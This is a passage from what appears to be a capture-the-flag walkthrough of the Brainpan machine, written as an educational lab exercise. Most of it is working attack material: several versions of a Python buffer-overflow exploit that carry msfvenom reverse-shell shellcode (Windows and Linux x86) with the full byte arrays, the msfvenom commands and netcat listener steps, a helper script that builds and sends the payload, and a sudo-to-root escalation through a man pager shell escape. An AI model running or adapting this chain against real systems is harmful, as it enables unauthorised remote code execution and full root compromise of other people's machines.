"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
"\x36";
Edit exploit.py
Add a NOP sled (\x90 × 32) between the return address and the shellcode. After JMP ESP execution lands at the top of the stack, and the shikata_ga_nai decoder stub writes to the stack around ESP while it locates itself and unpacks, so shellcode placed directly at ESP can overwrite its own first bytes; the sled gives it room and is harmless to execute.
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
b"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
b"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
b"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
b"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
b"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
b"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
b"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
b"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
b"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
b"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
b"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
b"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
b"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
b"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
b"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
b"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
b"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
b"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
b"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
b"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
b"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
b"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
b"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
b"\x66\x3f\xb0\xea\x63\x7b\x76\x07\x1e\x14\x13\x27\x8d\x15"
b"\x36")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
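For the assembly step the scripts above perform by hand, an added example (not the page's exploit): it packs the return address little-endian, builds padding, address, NOP sled and shellcode as one bytes object, and refuses to send anything that contains a bad character. The offset, the JMP ESP address and the single bad character are the values found above; the int3 stub used as shellcode is a constructed stand-in that makes the debugger break right after JMP ESP, a useful first test before swapping in the msfvenom output. The script name build.py and its command-line form are assumptions.

```python
import socket
import struct
import sys

# Values from the walkthrough above; the shellcode is a stand-in.
OFFSET = 524                  # bytes of padding before the saved return address
JMP_ESP = 0x311712F3          # FF E4 inside brainpan.exe, found with mona
BADCHARS = b"\x00"            # the only bad character found on this target
INT3_STUB = b"\xcc" * 8       # constructed test shellcode: int3 breaks into the debugger


def has_badchars(blob, badchars=BADCHARS):
    """Return the bad-character values present in `blob` (empty list if clean)."""
    return [b for b in badchars if b in blob]


def build_payload(shellcode, offset=OFFSET, ret_addr=JMP_ESP, nops=32, badchars=BADCHARS):
    """padding | return address (little-endian) | NOP sled | shellcode | CRLF.
    Refuses to build if the address or the shellcode contains a bad character,
    the failure that otherwise breaks a correct exploit silently."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = has_badchars(blob, badchars)
        if hit:
            raise ValueError(f"{name} contains bad char(s) {[hex(b) for b in hit]}")
    return b"A" * offset + ret + b"\x90" * nops + shellcode + b"\r\n"


def layout(payload, offset):
    """Read the finished buffer back the way the target will: the value that
    lands in EIP and the bytes ESP will point at right after the return."""
    return {
        "eip": struct.unpack_from("<I", payload, offset)[0],
        "esp_points_to": payload[offset + 4:offset + 8],
        "length": len(payload),
    }


def send_payload(host, port, payload):
    """Deliver the buffer exactly as bytes, with no str encoding step in between."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)          # wait for the prompt so the line reader is ready
        s.sendall(payload)


if __name__ == "__main__":
    # usage: python3 build.py <target-ip> [port]; sends the int3 stub, so the
    # debugger should break right after JMP ESP if the layout is correct
    payload = build_payload(INT3_STUB)
    print(layout(payload, OFFSET))
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 9999
        send_payload(sys.argv[1], port, payload)
```

Replace INT3_STUB with the msfvenom buffer (as a bytes literal) once the breakpoint test passes; build_payload then also guards against a stage that was generated without the right -b list.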
Set up a listener on port 7777 (e.g. nc -nvlp 7777)
Run exploit.py
We get a reverse shell from the local Windows VM
Now apply the same exploit to the target
Do the same, but with the tun0 (VPN) IP as LHOST, since the target has to connect back over the VPN
Generate reverse shell payload
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.252.53 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
"\xda";
Edit exploit.py
Change target address to THM brainpan IP
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xba\xb9\x16\x38\xe2\xdb\xcd\xd9\x74\x24\xf4\x5f\x33\xc9"
b"\xb1\x52\x31\x57\x12\x03\x57\x12\x83\x7e\x12\xda\x17\x7c"
b"\xf3\x98\xd8\x7c\x04\xfd\x51\x99\x35\x3d\x05\xea\x66\x8d"
b"\x4d\xbe\x8a\x66\x03\x2a\x18\x0a\x8c\x5d\xa9\xa1\xea\x50"
b"\x2a\x99\xcf\xf3\xa8\xe0\x03\xd3\x91\x2a\x56\x12\xd5\x57"
b"\x9b\x46\x8e\x1c\x0e\x76\xbb\x69\x93\xfd\xf7\x7c\x93\xe2"
b"\x40\x7e\xb2\xb5\xdb\xd9\x14\x34\x0f\x52\x1d\x2e\x4c\x5f"
b"\xd7\xc5\xa6\x2b\xe6\x0f\xf7\xd4\x45\x6e\x37\x27\x97\xb7"
b"\xf0\xd8\xe2\xc1\x02\x64\xf5\x16\x78\xb2\x70\x8c\xda\x31"
b"\x22\x68\xda\x96\xb5\xfb\xd0\x53\xb1\xa3\xf4\x62\x16\xd8"
b"\x01\xee\x99\x0e\x80\xb4\xbd\x8a\xc8\x6f\xdf\x8b\xb4\xde"
b"\xe0\xcb\x16\xbe\x44\x80\xbb\xab\xf4\xcb\xd3\x18\x35\xf3"
b"\x23\x37\x4e\x80\x11\x98\xe4\x0e\x1a\x51\x23\xc9\x5d\x48"
b"\x93\x45\xa0\x73\xe4\x4c\x67\x27\xb4\xe6\x4e\x48\x5f\xf6"
b"\x6f\x9d\xf0\xa6\xdf\x4e\xb1\x16\xa0\x3e\x59\x7c\x2f\x60"
b"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
b"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
b"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
b"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
b"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
b"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
b"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
b"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
b"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
b"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
b"\xda")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.220.161',9999))
s.send(payload)
s.close()
Set up a listener on port 7777 and run exploit.py
A shell comes back, but it is a Windows cmd shell running under Wine on a Linux host (brainpan.exe is not running on Windows), so it gives no proper access to the Linux system. Since the process is really a Linux process, the same overflow can carry Linux x86 shellcode instead.
Terminate and restart the machine (the crash took the service down), then generate a Linux payload
Generate a Linux payload
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.252.53 LPORT=5555 -b "\x00" -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";
Edit exploit.py
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
b"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
b"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
b"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
b"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
b"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
b"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55")
print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.x.x',9999))   # the target's new IP after the restart
s.send(payload)
s.close()
Set up a listener on port 5555, run exploit.py and catch the shell, which comes back as the user puck
Spawn a TTY shell, e.g. python -c 'import pty; pty.spawn("/bin/bash")'
Escalating Privileges
After spawning a TTY Shell
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ /home/anansi/bin/anansi_util network
/home/anansi/bin/anansi_util network
bash: /home/anansi/bin/anansi_util: Permission denied
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
link/ether 02:46:b1:a1:5f:0b brd ff:ff:ff:ff:ff:ff
inet 10.10.80.44/16 brd 10.10.255.255 scope global eth0
inet6 fe80::46:b1ff:fea1:5f0b/64 scope link
valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
sudo /home/anansi/bin/anansi_util proclist
'unknown': unknown terminal type.
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man#
What happened: anansi_util manual hands its argument to man, which runs as root under sudo and shows the page through a pager. The pager accepts shell escape sequences, so typing !/bin/bash at its "press RETURN" prompt spawns a root shell. The proclist action failed for a related reason: TERM is not set in the reverse shell, so run export TERM=xterm first. The same trick works for any program that can be run through sudo and offers a shell escape, vim (:!/bin/bash) among them.
Upgrading the shell
After spawning the TTY shell:
Ctrl-Z (suspend the shell)
stty raw -echo; fg
fg again, or press Enter, if the prompt does not come back straight away
export TERM=xterm
The shell is now fully interactive, with a known terminal type, tab completion and Ctrl-C passed through to the target